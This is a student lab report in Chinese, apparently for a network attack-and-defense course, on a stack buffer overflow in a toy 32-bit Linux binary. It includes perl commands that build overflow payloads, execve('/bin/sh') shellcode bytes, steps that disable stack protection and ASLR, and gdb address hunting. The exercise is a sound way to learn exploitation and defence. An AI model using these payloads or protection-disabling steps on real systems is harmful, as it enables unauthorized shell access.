学号 20221916袁源《网络攻防实践》第9次作业

1.实验内容

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。
2.实验要求
掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
掌握反汇编与十六进制编程器
能正确修改机器指令改变程序执行流程
能正确构造payload进行bof攻击

2.实验过程

1.本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数，foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。
首先进入pwn1存放的路径。输入指令"cd /home/kali/Desktop/"，进入存放pwn1的路径。
使用objdump对pwn1进行反汇编，输入指令"objdump -d pwn1 | more"。找到main函数的相关部分。
可以看出main调用foo函数的相关语句。
输入指令"vi pwn1"，使用vi文本编辑器查看该文件。之后输入指令":%!xxd"，将显示模式切换为16进制模式。
然后查找要修改的内容"/e8 d7"，找到对应数据。
将"d7"修改成"c3"，每修改一个字符，按一个r，修改一次。
修改完毕数据后，输入指令":%!xxd -r"将文件恢复文本显示。最后输入":wq!"保存并退出。
再次输入指令"objdump -d pwn1 | more"查看反编译结果。可以看出已经调用了"getShell"函数。修改成功。
运行修改后的文件，验证通过。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

本次实验，通过构造一个攻击输入字符串来修改程序的返回地址，达成攻击的目标。通过观察pwn1程序的汇编代码，发现main函数调用foo函数后只给输入的数据分配了28字节（0x1c）的空间。因此，构造一个字符串使它的长度可以溢出至EIP所在位置，将返回地址"80484ba"覆盖为getShell函数的地址"804847d"，则程序执行完foo函数后将返回到getShell函数去执行，完成攻击。
输入指令"perl -e ‘print “12345678902234567890323456789042\x7d\x84\x04\x08\x0a”’ > input"生成input文件。
输入指令"(cat input; cat) | ./pwn1"，将构造好的字符串输入程序并运行。
发现指令运行不了，出现了拒绝任务
获取根权限后成功输出。

3.注入一个自己制作的shellcode并运行这段shellcode。

首先更换源和安装包。输入指令"sudo vim /etc/apt/sources.list"，打开sources.list文件。在文件中添加以下内容：
- deb http://http.kali.org/kali kali-rolling main contrib non-free
- deb http://http.kali.org/kali sana main non-free contrib
- deb http://security.kali.org/kali-security sana/updates main contrib non-free
- deb http://old.kali.org/kali moto main non-free contrib
然后保存退出。输入指令"sudo apt-get update"再进行更新。
输入指令"apt-get install prelink"安装相关软件。
然后对操作系统和程序进行一些设置，方便找到注入的数据的地址。
安装execstack

输入这些指令：

execstack -s pwn1916（设置堆栈可执行）
execstack -q pwn1916（查询文件的堆栈是否可执行）
more /proc/sys/kernel/randomize_va_space（查看地址随机化的状态）
echo “0” > /proc/sys/kernel/randomize_va_space（关闭地址随机化）

采用的构造方法是retaddr+nop+shellcode，开始构造要注入的shellcode。将shellode放到缓冲区之后的内存中。shellcode为：“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”。
之后确定retaddr，构造用十六进制表示的37个字节的输入文件。输入指令"perl -e ‘print “\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00”’ > input_shellcode"。
输入指令pwn1916：(cat input_shellcode; cat) | ./pwn1916开始运行。
使用ps -ef | grep pwn1916找到对应的进程号为9201。
输入指令"gdb pwn1916"打开gdb对pwn1916进行调试。然后输入指令"attach 9201"找到对应的进程。输入指令"disassemble foo"对foo函数进行反汇编，找到应该放置断点的位置，即断点应该放到ret之前。然后输入指令"break *0x080484ae"设置断点。
设置完毕，之前运行pwn1916的终端中按下回车继续执行程序。gdb中输入指令"c"，继续执行。
程序中断，输入指令"info r esp"查看栈顶指针所在的位置，并查看改地址存放的数据为：0xffffd020。
输入指令"x/16x 0xffffd020"查看存放内容。其中的0x01020304，就是返回地址的位置。根据input_shellcode可知，shellcode就在其后（+4），所以地址应为0xffffd180。
输入指令"perl -e ‘print “A” x 32;print “\x80\xd1\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a”’ > input_shellcode"构造最终的shellcode。
在一个新终端中输如指令"(cat input_shellcode;cat) | ./pwn1916"再次运行。

3.学习中遇到的问题及解决

问题1：显示文件无法运行
问题1解决方案：因为pwn是外部复制来的文件，默认没有执行权限，所以无法运行。需要先用sudo su取得root权限再用chmod 777 ./pwn1916赋予权限。
问题2：显示找不到文件
问题2解决方案：默认的打开路径是没有pwn文件的，需要手动cd到文件路径的位置去。

4.学习感悟、思考等

通过本次实验，我学习到了软件安全攻防的基本原理和方法。熟悉了配置安装环境的过程，安装了各种工具。提高了对缓冲区溢出和shellcode的理解，更提高的自我学习的能力，让我受益匪浅。